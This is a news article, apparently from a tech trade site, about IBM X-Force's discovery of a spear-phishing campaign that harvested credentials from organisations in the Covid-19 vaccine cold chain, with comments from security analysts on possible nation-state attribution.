weyo – stock.adobe.com
Elements of the international vaccine supply chain are being targeted by a worldwide phishing campaign that is probably the work of a nation state-backed cyber attacker, according to IBM Security’s X-Force unit.
This development comes hot on the heels of a global alert issued by Interpol to its 194 member states, warning that malicious actors were tooling up to target organisations associated with Covid-19 vaccines.
The ongoing campaign is targeting organisations closely associated with the cold chain – part of the vaccine supply chain that ensures the safe preservation of vaccines in temperature-controlled environments during transit.
The cold chain will be critical for the deployment of two of the most promising Covid-19 vaccines, that developed by Pfizer/BioNTech, which needs to be kept at -70°C, and that developed by Moderna, which needs to be kept at -20°C.
The X-Force team said its analysis pointed to a “calculated operation” starting in September, spanning six countries and targeting organisations associated with international vaccine alliance Gavi’s Cold Chain Equipment Optimisation Platform (CCEOP).
It was unable to precisely attribute the campaign, but said that both precision targeting of key executives at relevant organisations bore the “potential hallmarks of nation-state tradecraft”.
IBM senior strategic cyber threat analyst Claire Zaboeva wrote: “While attribution is currently unknown, the precision targeting and nature of the specific targeted organisations potentially point to nation-state activity.
“Without a clear path to a cash-out, cyber criminals are unlikely to devote the time and resources required to execute such a calculated operation with so many interlinked and globally distributed targets. Likewise, insight into the transport of a vaccine may present a hot black-market commodity. However, advanced insight into the purchase and movement of a vaccine that can impact life and the global economy is likely to be a high-value and high-priority nation-state target.”
According to IBM X-Force, the attacker has been impersonating an executive at Haier Biomedical, a cold chain specialist, to target organisations including the European Commission’s Directorate General for Taxation and Customs Union, and companies in the energy, manufacturing, website creation and software and internet security sectors.
The spear-phishing emails targeted, in the main, executives in sales, procurement, IT and finance departments, but in some instances people in other parts of the organisation, too.
The subject lines are requests for quotations related to the CCEOP programme, but the emails instead contain malicious HTML attachments that open locally, prompting their victims to enter their credentials in order to view the file.
Their aim is almost certainly to harvest credentials, and so gain future access to corporate networks and data on vaccine distribution processes, methods and plans, such as information on how governments will get the Covid-19 vaccine into the hands of national health services.
Max Heinemeyer, director of threat hunting at Darktrace, said attacking the vaccine supply chain was likely to be easier for the perpetrators than going after the core targets in the healthcare sector.
“This particular effort to disrupt vaccine research and development confirms that the barrier between the ‘cyber’ and ‘physical’ supply chains has all but dissolved,” he said. “Attacks today can start in the inbox and end up disrupting the delivery chain of a critical vaccine or service.
“A single phishing attack is easy to conduct, but executing an orchestrated spear-phishing campaign against high-profile targets like this shows a lot of sophistication. The attack appears broad and sophisticated – broader than typical cyber crime campaigns that aim for quick monetisation.”
Although the goals of the campaign are, at this stage, merely speculation, Heinemeyer suggested that information about the physical whereabouts of vaccines that need to be kept extremely cold could be useful data for many nation states.
The fact that the campaign has been going on for some time is also a concern, he added. “Organisations need to get much better at detecting unusual digital activity at a far earlier stage, using cutting-edge defence technology – particularly artificial intelligence – across the entirety of their digital infrastructure,” he said.
Maria Namestnikova, head of Kaspersky’s Global Research and Analysis Team (GReAT) in Russia, said: “Threat actors are continuing to pivot and exploit the Covid-19 pandemic to carry out highly advanced cyber attacks with this latest attack on the Covid-19 vaccine. Recently, Kaspersky and several other cyber security companies have noted a growing interest on the part of APT threat actors in vaccine developments.
“During the first six months of research on a Covid-19 vaccine, there were only messages from Western intelligence agencies on the WellMess attacks against drug developers. Now, in just the past few weeks, the cyber security community has reported attempts to compromise researchers in the US, South Korea, Canada, France and India.
“Some of this activity is reported to have been linked to North Korean actors. In general, we believe that interest from APT actors in vaccine development will continue to grow, and that these attacks will be leveraged as part of a geopolitical strategy. Thus, false flags, for example, email addresses with a .ru domain – a technique already used by some threat actors – may be used to try to deflect suspicion from the attackers, leading to potential geopolitical disputes.”
IBM’s Zaboeva added: “IBM Security X-Force urges companies in the Covid-19 supply chain – from research of therapies, healthcare delivery to distribution of a vaccine – to be vigilant and remain on high alert during this time.
“Governments have already warned that foreign entities are likely to attempt to conduct cyber espionage to steal information about vaccines. Today, in conjunction with this blog, DHS CISA is issuing an alert encouraging organisations associated with the storage and transport of a vaccine to review this research and recommended best practices to remain vigilant.”
In this e-guide, we will explore the links between ransomware attacks, data breaches and identity theft. First, Nicholas Fearn investigates the phenomenon of the double extortion attack, and shares some insider advice on how to stop them, while we’ll explore the top five ways data backups can protect against ransomware in the first place.
The business response to COVID-19 has accelerated technology adoption, making emerging technologies a more accessible and …
The Open Group is teaming up with a United Nations agency on best practices, guides and standards to show resource-strapped …
Companies need to work on ensuring their developers are satisfied with their jobs and how they’re treated, otherwise it’ll be …
Staffing shortages, budget allocation issues, and inadequate analytics and filtering are among the challenges organizations will …
In the first of a two-part series, Jonathan Meyers examines the issues surrounding the security skills gap that companies must …
Find out how the Secure Access Service Edge model provides increased work-from-home security and cloud access outside of the …
Network teams can avoid signal coverage issues by performing different wireless site surveys as they evaluate new spaces, set up …
SD-WAN, SASE or some combination of the two — which approach will deliver the best and most secure network connectivity in your …
Celona 5G technology uses Citizens Broadband Radio Service spectrum to bring private mobile networking to the enterprise, …
Colocation is not a silver-bullet solution for everyone. Discover the benefits and drawbacks that come with allowing a …
Finding the right server operating temperature can be tricky. ASHRAE standards provide guidance for all server classes and what …
These unexpected charges and fees can balloon colocation costs for enterprise IT organizations.
The enterprise edition of the MySQL database is being enhanced on Oracle Cloud Infrastructure to enable users to run analytics …
The U.S. government has made data sets from many federal agencies available for public access to use and analyze. Check out some …
Check out this excerpt from the new book Learn MongoDB 4.x from Packt Publishing, then quiz yourself on new updates and …
All Rights Reserved, Copyright 2000 – 2020, TechTarget
Privacy Policy
Cookie Preferences
Do Not Sell My Personal Info